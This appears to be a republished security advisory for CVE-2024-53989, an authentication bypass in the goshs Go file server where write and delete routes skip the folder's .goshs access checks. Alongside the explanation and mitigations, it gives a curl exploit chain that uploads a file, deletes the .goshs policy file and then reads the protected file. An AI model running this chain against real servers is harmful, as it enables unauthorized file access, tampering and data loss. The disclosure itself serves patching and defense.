Listen to this Post
The vulnerability (CVE-2024-53989) exists because goshs enforces per-folder `.goshs` ACL/basic-auth for read operations (directory listings and file serving) but completely skips authorization for state-changing HTTP methods and query parameters. Specifically, the routes for PUT, multipart POST /upload, ?mkdir, and `?delete` are dispatched directly to handler functions that never call the `.goshs` loading or authentication logic. An unauthenticated attacker can upload arbitrary files via `PUT` or multipart form, create new directories with ?mkdir, and delete any file (including the `.goshs` policy file) using `?delete` – all without providing credentials. Because the `?delete` handler uses `os.RemoveAll()` without any ACL check, the attacker can remove the `.goshs` file itself. Once the policy file is gone, the folder reverts to no authentication, allowing the attacker to read previously protected files. The flaw is not path traversal; the paths stay within the configured root. It is an authorization inconsistency: read paths call `findSpecialFile()` and apply custom auth (handler.go:285-305, 545-565, 590-630), while write/delete paths (server.go:94-100, 105-109; handler.go:119-123, 181-187; updown.go:18-60, 63-165; handler.go:679-698, 901-937) do not. Verified on v2.0.0-beta.3 and v1.1.4.
Platform: Go/goshs
Version: v2.0.0-beta.3
Vulnerability : Auth bypass
Severity: Critical
date: 2024-12-10
Prediction: 2025-01-15
What Undercode Say:
Check if target allows unauthenticated PUT curl -X PUT -d "test" http://target/protected/test.txt Attempt to delete .goshs ACL curl "http://target/protected/.goshs?delete" After deletion, read secret curl http://target/protected/secret.txt Enumerate mkdir capability curl "http://target/protected/newdir?mkdir"
Exploit:
Full exploit chain
TARGET="http://127.0.0.1:18091"
PROTECTED="/protected"
1. Upload malicious file
curl -X PUT --data-binary "injected" "${TARGET}${PROTECTED}/evil.txt"
2. Delete .goshs
curl "${TARGET}${PROTECTED}/.goshs?delete"
3. Access restricted data
curl "${TARGET}${PROTECTED}/secret.txt"
Protection from this CVE
- Upgrade to patched version (v2.0.0-beta.4 or later) once available.
- Apply middleware that enforces `.goshs` auth on ALL HTTP methods (PUT, POST, DELETE) and
?mkdir/?deletequery parameters. - Reject any request that attempts to delete or overwrite `.goshs` file regardless of auth status.
- Use network-level access control (e.g., firewall, reverse proxy with basic auth) as a temporary workaround.
Impact
- Confidentiality: Unauthenticated attacker can read all files inside a
.goshs-protected folder after deleting the policy file. - Integrity: Attacker can upload, overwrite, or delete any file within the protected folder, including creation of malicious content.
- Availability: Deleting `.goshs` removes the authentication barrier; attacker can also delete legitimate files, causing data loss.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

